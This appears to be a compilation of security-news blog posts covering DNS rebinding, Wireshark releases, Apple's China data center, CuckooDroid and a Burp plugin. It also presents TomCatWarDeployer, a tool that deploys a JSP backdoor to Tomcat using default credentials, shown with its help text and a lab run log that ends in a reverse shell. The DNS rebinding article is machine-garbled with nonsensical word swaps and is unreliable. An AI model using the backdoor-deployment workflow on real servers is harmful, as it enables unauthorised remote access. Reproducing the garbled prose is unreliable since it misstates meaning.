What is DNS Rebinding Attack? It's Work And Protection

what's DNS Rebinding attack? it's paintings And safety

what's DNS Rebinding attack?

DNS rebinding is a shape of pc attack or can say domain call laptop based totally attack. on this assault, a malicious net web page reasons traffic to run a client-facet script that assaults machines somewhere else on the network.

DNS rebinding attack may be used to breach a private network by using causing the victim's internet browser to get admission to machines at private IP addresses and return the results to the attacker. it could also be employed to use the sufferer system for spamming, allotted denial-of-provider attacks or other malicious sports.

Cybercriminal also can do DNS rebinding assault via Malicious advertising and marketing after which they are able to get right of entry to non-public facts on the network.

How DNS rebinding works?

The attacker registers a domain (consisting of anydomain.com) and delegates it to a DNS server underneath the attacker's manage. The server is configured to reply with a totally quick time to stay (TTL) report, preventing the response from being cached. while the sufferer browses to the malicious area, the attacker's DNS server first responds with the IP deal with of a server website hosting the malicious purchaser-side code.

 

as an instance, they might point the sufferer's browser to a internet site that incorporates malicious JavaScript or Flash scripts which are meant to execute at the victim's laptop.

The malicious customer-facet code makes additional accesses to the authentic domain name (along with attacker.com). these are accepted by way of the identical-beginning coverage. however, whilst the sufferer's browser runs the script it makes a new DNS request for the domain, and the attacker replies with a new IP address. for instance, they might reply with an inner IP deal with or the IP address of a goal somewhere else at the internet.

How can we guard Themselves?

the following strategies try and prevent DNS rebinding assaults:

 always use a robust password on your router. 

To Disable admin get right of entry to console in your router from any outside community.

internet browsers can put into effect DNS pinning: the IP cope with is locked to the cost obtained in the first DNS reaction. This technique may also block a few valid makes use of of Dynamic DNS, and might not work in opposition to all attacks. however, it is essential to fail secure (stop rendering) if the IP address does alternate, because the use of an IP address past the TTL expiration can open the other vulnerability whilst the IP address has legitimately changed and the expired IP address may additionally now be controlled via an attacker.

personal IP addresses may be filtered out of DNS responses.

outside public DNS servers with this filtering e.g. OpenDNS.

neighborhood sysadmins can configure the enterprise's neighborhood nameservers to block the resolution of external names into internal IP addresses. This has the downside of allowing an attacker to map the internal deal with tiers in use.

DNS filtering in a firewall or daemon e.g. dnswall.

net servers can reject HTTP requests with an unrecognized Host header.

The Firefox NoScript extension provides partial safety (for non-public networks)

It become first determined in 1996 and affected Java digital gadget.

WireShark Version 2.4.0 Released With New Features

WireShark Version 2.4.0 Released With New Features.

Wireshark is the world’s most open source popular network protocol analyzer. It is used for troubleshooting, analysis, development and education. 

New and Updated Capture File Support with ERF, IxVeriWave, Libpcap, and Pcap-ng, also there are major API Changes like IEEE802.11: wlan_mgt display filter element got renamed to wlan and Libgcrypt is now a required dependency.

There are total 21 issues were fixed in Wireshark 2.2.8

1. Experimental 32-bit and 64-bit Windows Installer (.msi) packages are available. It is recommended that you use these independently of the NSIS (.exe) installers. That is, you should make sure the NSIS package is completely uninstalled before installing the Windows Installer package and vice-versa.
2. Source packages are now compressed using xz instead of bzip2.
3. The legacy (GTK+) UI is disabled by default in the Windows installers.
4. The legacy (GTK+) UI is disabled by default in the development environment (Autotools and CMake).
5. SS7 Point Codes can now be resolved into names with a hosts-like file.
6. Wireshark can now go fullscreen to have more room for packets.
7. TShark can now export objects like the other GUI interfaces.
8. Support for G.722 and G.726 codecs in the RTP Player (via the SpanDSP library).
9. You can now choose the output device when playing RTP streams.
10. Added support for dissectors to include a unit name natively in their hf field. A field can now automatically append "seconds" or "ms" to its value without additional printf-style APIs.
11. The Default profile can now be reset to default values.
12. You can move back and forth in the selection history in the Qt UI.
13. IEEE 802.15.4 dissector now uses an UAT for decryption keys. The original decryption key preference has been obsoleted.
14. Extcap utilities can now provide configuration for a GUI interface toolbar to control the extcap utility while capturing.
15. Extcap utilities can now validate the capture filter.
16. Display filter function len() can now be used on all string and byte fields.
17. Added an experimental timeline view for 802.11 wireless packet data which can be enabled via the "802.11 radio information" preferences.
18. Added TLS 1.3 (draft 21) dissection and decryption support (Bug 12779).
19. The (D)TLS Application Layer protocol (e.g. HTTP or CoAP) can now be changed via the Decode As dialog.
20. The RSA keys dialog for SSL keys has improved feedback for invalid settings and no longer requires the IP address, Port or Protocol fields to be set in addition to the Key File.
21. TCP Analysis will detect and flag more spurious retransmissions.

New Protocol Support

Bluetooth HCI Vendor Intel, CAN FD, Citrix NetScaler Metric Exchange Protocol, Citrix NetScaler RPC Protocol, DirectPlay 8 protocol, Ericsson A-bis P-GSL, Ericsson A-bis TFP (Traffic Forwarding Protocol), Facebook Zero, Fc00/cjdns Protocol, Generic Netlink (genl), GSM Osmux, GSMTAP based logging, Health Level 7 (HL7), High-speed SECS message service (HSMS), HomePNA, IndigoCare iCall protocol, IndigoCare Netrix protocol, iPerf2, ISO 15765, Linux 802.11 Netlink (nl80211), Local Service Discovery (LSD), M2 Application Protocol, Mesh Link Establishment (MLE), MUDURL, Netgear Ensemble Protocol, NetScaler HA Protocol, NetScaler Metric Exchange Protocol, NetScaler RPC Protocol, NM protocol, Nordic BLE Sniffer, NVMe, NVMe Fabrics RDMA, OBD-II PIDs, OpenThread simulator, RFTap Protocol, SCTE-35 Digital Program Insertion Messages, Snort Post-dissector, Thread CoAP, UDP based FTP w/ multicast (UFTP and UFTP4), Unified Diagnostic Services (UDS), vSocket, Windows Cluster Management API (clusapi), and X-Rite i1 Display Pro (and derivatives) USB protocol.

You can download Wireshark here

Apple Opening its First Data Center in China With Promise Full Data Privacy

Apple Opening its First Data Center in China With Promise Full Data Privacy And New CyberSecurity Rules.

New Data center will open in Guizhou, also company would have to joined venture with local firm as per country regulation. 

Apple also mentioned it had  strong data privacy and security protections in place. No backdoors will be created into any of our systems.

In partnership with a local internet services company, Guizhou on the Cloud Big Data, we’re proud of the fact the facility will be fully powered by 100 percent renewable energy like all of our other data centers around the world,” Apple said in a statement sent to SecurityWeek.


Our Chinese customers love using iCloud to store their photos, videos, documents and apps securely, and to keep them updated across all of their devices. We're committed to continuously improving the user experience, and the addition of this data center will allow us to improve the speed and reliability of our products and services while also complying with newly passed regulations.

Apple has strong data privacy and security protections in place and no backdoors will be created into any of our systems," it said in the statement released Wednesday.

The firm did not give any financial details of the project, but China's state-run Xinhua news agency said it was part of a $1 billion investment. China has hundreds of millions of smartphone users and is a vital market for Apple, whose iPhones are wildly popular in the country.

Fu Liang, a Beijing-based independent telecom analyst, said more foreign data centres are expected under the cyber-security legislation. "The new rule requires this key information to be put in China. The boundary is very clear," Fu said.
He said the ramifications for Apple and other companies could be higher costs and potentially more restrictions under Chinese law.

"For (Apple) users, the good thing is their user experience like download speed will improve but the downside is that their access to overseas services and resources will be reduced," Fu added.
"It will be harder for them to access services that aren't allowed in China now."

TomCatWarDeployer: Apache Tomcat Auto WAR Deployment And Pwning Penetration Testing Tool

TomCatWarDeployer: Apache Tomcat Auto WAR deployment & Pwning Penetration Testing Tool..

Apache Tomcat auto WAR deployment & pwning penetration testing tool.

What is it?

This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy JSP Backdoor, as well as invoke it afterwards and provide nice shell (either via web gui, listening port binded on remote machine or as a reverse tcp payload connecting back to the adversary).

In practice, it generates JSP backdoor WAR package on-the-fly and deploys it at the Apache Tomcat Manager Application, using valid HTTP Authentication credentials that pentester provided (or custom ones, in the end, we all love tomcat:tomcat ).

Usage

As simple as providing server's address with port, as a IP:PORT pair. Here goes the help:

user$ python tomcatWarDeployer.py --help

    tomcatWarDeployer (v. 0.3)
    Apache Tomcat 6/7 auto WAR deployment & launching tool
    Mariusz B. / MGeeky '16

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

Usage: tomcatWarDeployer.py [options] server

server    Specifies server address. Please also include port after colon.

Options:
  -h, --help     show this help message and exit

  General options:
    -v, --verbose       Verbose mode.
    -s, --simulate      Simulate breach only, do not perform any offensive
                        actions.
    -G OUTFILE, --generate=OUTFILE
                        Generate JSP backdoor only and put it into specified
                        outfile path then exit. Do not perform any
                        connections, scannings, deployment and so on.
    -U USER, --user=USER
                        Tomcat Manager Web Application HTTP Auth username.
                        Default="tomcat"
    -P PASS, --pass=PASS
                        Tomcat Manager Web Application HTTP Auth password.
                        Default="tomcat"

Connection options:
    -H RHOST, --host=RHOST
                        Remote host for reverse tcp payload connection. When
                        specified, RPORT must be specified too. Otherwise,
                        bind tcp payload will be deployed listening on 0.0.0.0
    -p PORT, --port=PORT
                        Remote port for the reverse tcp payload when used with
                        RHOST or Local port if no RHOST specified thus acting
                        as a Bind shell endpoint.
    -u URL, --url=URL   Apache Tomcat management console URL. Default:
                        /manager/
    -t TIMEOUT, --timeout=TIMEOUT
                        Speciifed timeout parameter for socket object and
                        other timing holdups. Default: 10
Payload options:
    -R APPNAME, --remove=APPNAME
                        Remove deployed app with specified name. Can be used
                        for post-assessment cleaning
    -X PASSWORD, --shellpass=PASSWORD
                        Specifies authentication password for uploaded shell,
                        to prevent unauthenticated usage. Default: randomly
                        generated. Specify "None" to leave the shell
                        unauthenticated.
    -T TITLE, --title=TITLE
                        Specifies head>title for uploaded JSP WAR payload.
                        Default: "JSP Application"
    -n APPNAME, --name=APPNAME
                        Specifies JSP application name. Default: "jsp_app"
    -x, --unload        Unload existing JSP Application with the same name.
                        Default: no.
    -C, --noconnect     Do not connect to the spawned shell immediately. By
                        default this program will connect to the spawned
                        shell, specifying this option let's you use other
                        handlers like Metasploit, NetCat and so on.
    -f WARFILE, --file=WARFILE
                        Custom WAR file to deploy. By default the script will
generate own WAR file on-the-fly.

And sample usage on Kevgir 1 VM by canyoupwn.me running at 192.168.56.100:8080 :

user$ python tomcatWarDeployer.py -v -x -p 4449 -H 192.168.56.102 192.168.56.100:8080

    tomcatWarDeployer (v. 0.3)
    Apache Tomcat 6/7 auto WAR deployment & launching tool
    Mariusz B. / MGeeky '16

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

INFO: Reverse shell will connect to: 192.168.56.102:4449.
DEBUG: Browsing to "http://192.168.56.100:8080/manager/"... Creds: tomcat:tomcat
DEBUG: Apache Tomcat Manager Application reached & validated.
DEBUG: Generating JSP WAR backdoor code...
DEBUG: Preparing additional code for Reverse TCP shell
DEBUG: Generating temporary structure for jsp_app WAR at: 
"/tmp/tmpDhzo9I"
DEBUG: Working with Java at version: 1.8.0_60
DEBUG: Generating web.xml with servlet-name: "JSP Application"
DEBUG: Generating WAR file at: "/tmp/jsp_app.war"
DEBUG: added manifest
adding: files/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/web.xml(in = 547) (out= 253)(deflated 53%)
adding: files/META-INF/(in = 0) (out= 0)(stored 0%)
adding: files/META-INF/MANIFEST.MF(in = 68) (out= 67)(deflated 1%)
adding: index.jsp(in = 4684) (out= 1595)(deflated 65%)
DEBUG: WAR file structure:
DEBUG: /tmp/tmpDhzo9I
├── files
│   ├── META-INF
│   │   └── MANIFEST.MF
│   └── WEB-INF
│       └── web.xml
└── index.jsp

3 directories, 3 files
WARNING: Application with name: "jsp_app" is already deployed.
DEBUG: Unloading existing one...
DEBUG: Unloading application: "http://192.168.56.100:8080/jsp_app/"
DEBUG: Succeeded.
DEBUG: Deploying application: jsp_app from file: "/tmp/jsp_app.war"
DEBUG: Removing temporary WAR directory: "/tmp/tmpDhzo9I"
DEBUG: Succeeded, invoking it...
DEBUG: Spawned shell handling thread. Awaiting for the event...
DEBUG: Awaiting for reverse-shell handler to set-up
DEBUG: Establishing listener for incoming reverse TCP shell at 192.168.56.102:4449
DEBUG: Socket is binded to local port now, awaiting for clients...
DEBUG: Invoking application at url: "http://192.168.56.100:8080/jsp_app/"
DEBUG: Adding 'X-Pass: oHI9mPB0mOnZ' header for shell functionality authentication.
DEBUG: Incoming client: 192.168.56.100:54251
INFO: JSP Backdoor up & running on http://192.168.56.100:8080/jsp_app/
INFO: Happy pwning. Here take that password for web shell: 'oHI9mPB0mOnZ'
DEBUG: Connected with the shell: tomcat7@canyoupwnme

tomcat7@canyoupwnme $ id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)

tomcat7@canyoupwnme $ exit

The program will set-up a local listener for reverse-shell connection on the 192.168.56.102:4449 host (local host) as in the example above. Then, after invoking JSP Backdoor it will automatically connect with the local listener, resulting in shell being popped up. One can also skip -H parameter in order to go with bind shell functionality, whereas rather then setting local listener - the program will go and connect with remotely listening bind-shell.

Finally, the above invocation will result in the following JSP application accessible remotely via WEB:

JSP backdoor gui

As one can see, there is password needed for leveraging deployed backdoor, preventing thus unauthenticated access during conducted assessment.

Summing up, user has spawned WEB application providing WEB backdoor, authenticated via POST 'password' parameter that can be specified by user or randomly generated by the program. Then, the application upon receiving X-Pass header in the invocation phase, spawned reverse connection to our netcat handler. The HTTP header is being requested here in order to prevent user refreshing WEB gui and keep trying to bind or reverse connect. Also this makes use of authentication to reach that code.

That would be all I guess.

CHANGELOG

19.07.16: Version 0.3: Added bind-shell & Reverse-shell functionality to provide user with direct access to the shell.

TODO

1. Implement bind & reverse tcp payload functionality as well as some pty to interact with it
2. Finish implementing noconnect and connect functionality
3. Implement sort of communication authentication and encryption/encoding, to prevent flow of plain-text data through the wire/ether
4. Test it on tomcat8

Download

     

CuckooDroid - Automated Android Malware Analysis Tool

CuckooDroid - Automated Android Malware Analysis with Cuckoo Sandbox.

CuckooDroid is an extension of Cuckoo Sandbox the Open Source software for automating analysis of suspicious files, CuckooDroid brigs to cuckoo the capabilities of execution and analysis of android application.

CuckooDroid featured with VM-detection techniques, encryption key extraction, SSL inspection, API call trace, basic behavioural signatures. Also provides both static and dynamic APK inspection.

Installation - Easy integration script:

git config --global user.email "you@example.com"

 

 

git config --global user.name "Your Name"
git clone --depth=1 https://github.com/cuckoobox/cuckoo.git cuckoo -b 1.2
cd cuckoo
git remote add droid https://github.com/idanr1986/cuckoo-droid
git pull --no-edit -s recursive -X theirs droid master 
cat conf-extra/processing.conf >> conf/processing.conf
cat conf-extra/reporting.conf >> conf/reporting.conf
rm -r conf-extra
echo "protobuf" >> requirements.txt

Download

Wireshark 2.2.0 Announced With New Features And Bug Fixes

Wireshark is a free and open source packet analyzer. 

It is used for network troubleshooting, analysis, software and communications protocol development.
It formely known as Ethereal, Wireshark allows the user to put the network interface controllers for using Sniffing and can see all the live traffic on the Wireshark Interface.

New Bug Fixes

• Upgrading to latest version uninstalls Microsoft Visual C++ redistributable. (Bug 12712)
• Extcap errors not reported back to UI. (Bug 11892)

The following features are new (or have been significantly updated) since version 2.2.0rc2:

No major changes since 2.2.0rc2.

The following features are new (or have been significantly updated) since version 2.2.0rc1:

"Decode As" supports SSL (TLS) over TCP.

The following features are new (or have been significantly updated) since version 2.1.1:

Invalid coloring rules are now disabled instead of discarded. This will provide backward compatibility with a coloring rule change in Wireshark 2.2.

The following features are new (or have been significantly updated) since version 2.1.0:

• Added -d option for Decode As support in Wireshark (mimics TShark functionality)
• The Qt UI, GTK+ UI, and TShark can now export packets as JSON. TShark can additionally export packets as Elasticsearch-compatible JSON.
• The Qt UI now supports the -j, -J, and -l flags. The -m flag is now deprecated.
• The Conversations and Endpoints dialogs are more responsive when viewing large numbers of items.
• The RTP player now allows up to 30 minutes of silence frames.
• Packet bytes can now be displayed as EBCDIC.
• The Qt UI loads captures faster on Windows.
• proto_tree_add_checksum was added as an API. This attempts to standardize how checksums are reported and filtered for within *Shark. There are no more individual "good" and "bad" filter fields, protocols now have a "checksum.status" field that records "Good", "Bad" and "Unverified" (neither good or bad). Color filters provided with Wireshark have been adjusted to the new display filter names, but custom ones may need to be updated.

The following features are new (or have been significantly updated) since version 2.0.0:

• The intelligent scroll bar now sits to the left of a normal scroll bar and provides a clickable map of nearby packets.
• You can now switch between between Capture and File Format dissection of the current capture file via the View menu in the Qt GUI.
• You can now show selected packet bytes as ASCII, HTML, Image, ISO 8859-1, Raw, UTF-8, a C array, or YAML.

You can now use regular expressions in Find Packet and in the advanced preferences.

Name resolution for packet capture now supports asynchronous DNS lookups only. Therefore the "concurrent DNS resolution" preference has been deprecated and is a no-op. To enable DNS name resolution some build dependencies must be present (currently c-ares). If that is not the case DNS name resolution will be disabled (but other name resolution mechanisms, such as host files, are still available).

The byte under the mouse in the Packet Bytes pane is now highlighted.

• TShark supports exporting PDUs via the -U flag.
• The Windows and OS X installers now come with the "sshdump" and "ciscodump" extcap interfaces.
• Most dialogs in the Qt UI now save their size and positions.
• The Follow Stream dialog now supports UTF-16.
• The Firewall ACL Rules dialog has returned.
• The Flow (Sequence) Analysis dialog has been improved.
• We no longer provide packages for 32-bit versions of OS X.
• The Bluetooth Device details dialog has been added.

Source: Wireshark

Vulners: Software Vulnerability Scanner Plugin For Burp Suite Professional

Vulners scanner Plugin Released  For Automatic Vulnerability Detection In Passive Scan mode

vulnersCom/burp-vulners-scanner Vulnerability scanner based on vulners.com search API

Burp Suite scanner plugin based on Vulners.com vulnerability database API

• Search fingerprints in http response (inspired by plugin "Software Version Reporter") and check found version in vulners.com vulnerability database
• [Experemental] Check unique URLs in vulners.com finding exploits for such pathsIf Vulners Plugin detects vulnerable software it will show you CVE, advisoroies and even applicable exploits!
  
  
   

  Requirements

  • Burp Suite - Professional Edition
  • Java 1.7
  • Maven

   

  Installation

  • Clone repository
  • From command line run
  • mvn package
  • find burp-vulners-scanner.jar in /target folder
  • open Burp Suite -> Extender -> Add -> path to plugin.jar

  
  

  Build

  Ready to install build burp-vulners-scanner.jar
  
  Software Vulnerability scanner plugin for Burp Suite Professional
  Main functionality:
  

  • Detect vulnerable software by discovered fingerprints in HTTP responses
  • Check unique urls finding exploits with such paths

  Download Burp Suite Plugin